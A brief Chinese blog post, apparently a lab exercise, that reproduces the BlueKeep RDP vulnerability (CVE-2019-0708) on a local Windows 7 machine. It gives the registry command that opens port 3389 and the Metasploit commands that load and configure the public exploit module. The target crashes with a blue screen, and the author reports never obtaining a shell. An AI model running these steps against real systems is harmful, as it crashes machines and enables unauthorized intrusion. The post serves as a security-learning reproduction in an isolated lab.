cve-2019-0708复现

准备工作

靶机:win 7 ip:192.168.128.128 开放3389端口
攻击机:kali2 ip:192.168.128.129

实际操作

对靶机进行开放3389
在cmd内输入

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

使用netstat 查看端口开放情况
cve-2019-0708复现_第1张图片在kali里开启msf

输入msfconsole
如果没有找到建议更新一下软件apt-get install metasploit-framework
查找exp 输入 search 0708
cve-2019-0708复现_第2张图片
使用 exp 输入use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
使用 show options 查看主要参数

cve-2019-0708复现_第3张图片
使用show targets 查看攻击目标
cve-2019-0708复现_第4张图片
设置参数

set rhost 192.168.128.128 
set  target 3 

在这里插入图片描述
运行结果

cve-2019-0708复现_第5张图片

靶机直接蓝屏

最后

不知怎的就是不能获取道shell,查阅资料设置set forceexploit true 还是不能得到shell

你可能感兴趣的:(cve-2019-0708复现)